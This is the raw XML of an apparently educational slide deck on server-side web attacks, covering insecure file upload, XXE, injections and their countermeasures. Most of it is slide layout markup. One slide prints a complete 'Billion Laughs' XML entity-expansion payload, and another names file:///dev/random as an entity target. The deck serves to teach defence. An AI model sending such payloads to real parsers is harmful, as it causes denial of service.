              <a:t>Route::get('/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>showprofile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>', [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>UserController</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>::class, '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>showprofile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>’]);</a:t>
            </a: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	https://laravel.com/docs/8.x/routing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e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>: Django (Python): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>urlpatterns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> = [ path('/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>showprofile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>views.userprofile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>)]</a:t>
            </a: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	https://docs.djangoproject.com/en/3.1/topics/http/urls/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DF819DD0-E742-4E67-9762-50F655D2D9B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="10179262" y="1865588"/>
            <a:ext cx="189188" cy="851339"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 189188"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 851339"/>
              <a:gd name="connsiteX1" fmla="*/ 94594 w 189188"/>
              <a:gd name="connsiteY1" fmla="*/ 15765 h 851339"/>
              <a:gd name="connsiteX2" fmla="*/ 94594 w 189188"/>
              <a:gd name="connsiteY2" fmla="*/ 400225 h 851339"/>
              <a:gd name="connsiteX3" fmla="*/ 189188 w 189188"/>
              <a:gd name="connsiteY3" fmla="*/ 415990 h 851339"/>
              <a:gd name="connsiteX4" fmla="*/ 94594 w 189188"/>
              <a:gd name="connsiteY4" fmla="*/ 431755 h 851339"/>
              <a:gd name="connsiteX5" fmla="*/ 94594 w 189188"/>
              <a:gd name="connsiteY5" fmla="*/ 835574 h 851339"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 189188"/>
              <a:gd name="connsiteY6" fmla="*/ 851339 h 851339"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 189188"/>
              <a:gd name="connsiteY7" fmla="*/ 434183 h 851339"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 189188"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 851339"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 189188"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 851339"/>
              <a:gd name="connsiteX1" fmla="*/ 94594 w 189188"/>
              <a:gd name="connsiteY1" fmla="*/ 15765 h 851339"/>
              <a:gd name="connsiteX2" fmla="*/ 94594 w 189188"/>
              <a:gd name="connsiteY2" fmla="*/ 400225 h 851339"/>
              <a:gd name="connsiteX3" fmla="*/ 189188 w 189188"/>
              <a:gd name="connsiteY3" fmla="*/ 415990 h 851339"/>
              <a:gd name="connsiteX4" fmla="*/ 94594 w 189188"/>
              <a:gd name="connsiteY4" fmla="*/ 431755 h 851339"/>
              <a:gd name="connsiteX5" fmla="*/ 94594 w 189188"/>
              <a:gd name="connsiteY5" fmla="*/ 835574 h 851339"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 189188"/>
              <a:gd name="connsiteY6" fmla="*/ 851339 h 85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188" h="851339" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="52019" y="-298"/>
                  <a:pt x="93537" y="4752"/>
                  <a:pt x="94594" y="15765"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="118501" y="165787"/>
                  <a:pt x="77150" y="269671"/>
                  <a:pt x="94594" y="400225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96886" y="410851"/>
                  <a:pt x="127031" y="416827"/>
                  <a:pt x="189188" y="415990"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="134887" y="415456"/>
                  <a:pt x="94631" y="420905"/>
                  <a:pt x="94594" y="431755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="97835" y="589540"/>
                  <a:pt x="70994" y="704786"/>
                  <a:pt x="94594" y="835574"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101035" y="843755"/>
                  <a:pt x="53782" y="849544"/>
                  <a:pt x="0" y="851339"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-5401" y="665610"/>
                  <a:pt x="6591" y="631027"/>
                  <a:pt x="0" y="434183"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-6591" y="237339"/>
                  <a:pt x="48781" y="119132"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="189188" h="851339" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="52039" y="-200"/>
                  <a:pt x="92952" y="7208"/>
                  <a:pt x="94594" y="15765"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="95964" y="127570"/>
                  <a:pt x="63852" y="274985"/>
                  <a:pt x="94594" y="400225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103904" y="403414"/>
                  <a:pt x="142198" y="418763"/>
                  <a:pt x="189188" y="415990"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="138087" y="415228"/>
                  <a:pt x="95851" y="423471"/>
                  <a:pt x="94594" y="431755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123945" y="572589"/>
                  <a:pt x="57758" y="636080"/>
                  <a:pt x="94594" y="835574"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102672" y="837887"/>
                  <a:pt x="52667" y="849917"/>
                  <a:pt x="0" y="851339"/>
                </a:cubicBezTo>
              </a:path>
              <a:path w="189188" h="851339" fill="none" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="52626" y="-204"/>
                  <a:pt x="94434" y="7425"/>
                  <a:pt x="94594" y="15765"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101263" y="181974"/>
                  <a:pt x="91762" y="255672"/>
                  <a:pt x="94594" y="400225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88783" y="407848"/>
                  <a:pt x="133699" y="417369"/>
                  <a:pt x="189188" y="415990"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="138104" y="417826"/>
                  <a:pt x="95621" y="424389"/>
                  <a:pt x="94594" y="431755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115117" y="561201"/>
                  <a:pt x="91715" y="735015"/>
                  <a:pt x="94594" y="835574"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="100679" y="842162"/>
                  <a:pt x="52034" y="847203"/>
                  <a:pt x="0" y="851339"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="00FF00"/>
            </a:solidFill>
            <a:extLst>
              <a:ext uri="{C807C97D-BFC1-408E-A445-0C87EB9F89A2}">
                <ask:lineSketchStyleProps xmlns:ask="http://schemas.microsoft.com/office/drawing/2018/sketchyshapes" sd="1016326206">
                  <a:prstGeom prst="rightBrace">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 8333"/>
                      <a:gd name="adj2" fmla="val 4886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B20F731-1FBF-480D-90B2-A5A0802B7946}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7588469" y="2457731"/>
            <a:ext cx="44353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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>  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it‘s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php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>file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showprofile.php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gets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executed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with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php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interpreter</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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8082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281769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Insecure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 Upload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Upload a malicious file for execution of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exploiting insufficient server-side restrictions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trust any metadata sent from the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 a new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Store it outside the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>webroot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the real </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>mimetype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 max </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>filesize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34463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839773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Insecure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 Upload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Upload a malicious file for execution of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exploiting insufficient server-side restrictions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trust any metadata sent from the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 a new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Store it outside the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>webroot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the real </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>mimetype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 max </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>filesize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59631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197206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Insecure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 Upload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Upload a malicious file for execution of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exploiting insufficient server-side restrictions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trust any metadata sent from the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 a new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Store it outside the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>webroot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the real </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>mimetype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 max </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>filesize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16622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9AF4D2CD-CD4E-4D7A-A54C-507BB578B2BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070365" y="2296585"/>
            <a:ext cx="10198413" cy="20967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ok, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>there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one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>special</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>filetype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>left</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t>…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9723410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F09F37A-27E9-4BD1-8CA2-65083E9F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71" y="1893174"/>
            <a:ext cx="4067845" cy="260787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82C9737-F714-4BA5-8EFA-7256F350F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071" y="1893175"/>
            <a:ext cx="4647912" cy="260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616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795BDE4-2652-4EE5-AB08-98DA15B4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51" y="1861973"/>
            <a:ext cx="5622220" cy="269951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BFC92E-A289-4F02-85FD-B19B2ACAD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547" y="1197193"/>
            <a:ext cx="44481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1DC1B74-735A-4EE2-A1CA-593D232B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06" y="806176"/>
            <a:ext cx="6494241" cy="274632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80F66A3-1CE7-4C97-B235-E7B5E036F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431" y="819314"/>
            <a:ext cx="4391025" cy="18573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C558AE4-8B6B-471B-A2EF-5F8589502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593" y="3376449"/>
            <a:ext cx="3314700" cy="10382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00775B0-B438-434E-ABE0-E3FFFBEA0944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575606" y="5114434"/>
            <a:ext cx="7853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also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very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bad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: file:///dev/random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968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F585188-9223-4B18-BFF7-5181464B59CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064815" y="1690688"/>
            <a:ext cx="100623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&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&lt;!DOCTYPE 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 [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &lt;!ENTITY lol "lol"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &lt;!ELEMENT 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 (#PCDATA)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &lt;!ENTITY lol1 "&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &lt;!ENTITY lol2 "&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &lt;!ENTITY lol3 "&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &lt;!ENTITY lol4 "&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &lt;!ENTITY lol5 "&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &lt;!ENTITY lol6 "&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &lt;!ENTITY lol7 "&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &lt;!ENTITY lol8 "&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> &lt;!ENTITY lol9 "&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty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&gt;&amp;lol9;&lt;/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&gt;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4353B9-FDAF-4BEF-836E-51F59E3A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Billion Laughs Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="383655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57F056C-F162-4311-9271-30E4557D0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50" y="594591"/>
            <a:ext cx="10877300" cy="5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719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831839"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="5102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460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External Entity (XXE)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sensitive files, send HTTP requests to other systems or cause a DoS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11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1928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773019"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="5102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460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External Entity (XXE)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sensitive files, send HTTP requests to other systems or cause a DoS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abusing a feature of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11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27080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784714"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="5102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460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External Entity (XXE)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sensitive files, send HTTP requests to other systems or cause a DoS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abusing a feature of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11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Disable the processing of external entities in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17885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212359"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="5102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460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External Entity (XXE)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sensitive files, send HTTP requests to other systems or cause a DoS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abusing a feature of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11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Disable the processing of external entities in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A4:2017-XML External </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0" err="1"/>
                        <a:t>Entities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0"/>
                        <a:t> (XXE)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61662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811366"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="5102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460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External Entity (XXE)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sensitive files, send HTTP requests to other systems or cause a DoS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abusing a feature of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11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Disable the processing of external entities in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A4:2017-XML External </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0" err="1"/>
                        <a:t>Entities</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-AT" dirty="0"/>
                        <a:t> (XXE)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2626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B625F-DA6E-4DFB-AF8F-C92E97F5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EDFB3C-FB40-4708-97C1-7D78199EE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interactions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backend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attacked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injections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Strictly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> separate code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>structure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> and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lvl="1"/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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Strictly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– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>ever</a:t>
            </a:r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671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2D16BAF-1448-4321-AB02-8FF30EB9C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" t="460"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3121642" y="31531"/>
            <a:ext cx="5948715" cy="68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E3E285F-183B-432B-A0E8-C35C1FCA1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4" y="392486"/>
            <a:ext cx="11225492" cy="5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3105</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Breitbild</PresentationFormat>
  <Paragraphs>509</Paragraphs>
  <Slides>86</Slides>
  <Notes>37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86</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="91" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Office</vt:lpstr>
      <vt:lpstr>Server-side Attacks</vt:lpstr>
      <vt:lpstr>Rough Overview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Prepared Statements example</vt:lpstr>
      <vt:lpstr>ORM example (Doctrine)</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Further exploitation</vt:lpstr>
      <vt:lpstr>Old but gold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Some more backend injections</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Characters for separation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Countermeasures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Countermeasures (excerpt)</vt:lpstr>
      <vt:lpstr>Remember request routing ???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Billion Laughs Attack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Key messages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2021-02-23T21:04:15Z</dcterms:modified>
</cp:coreProperties>
</file>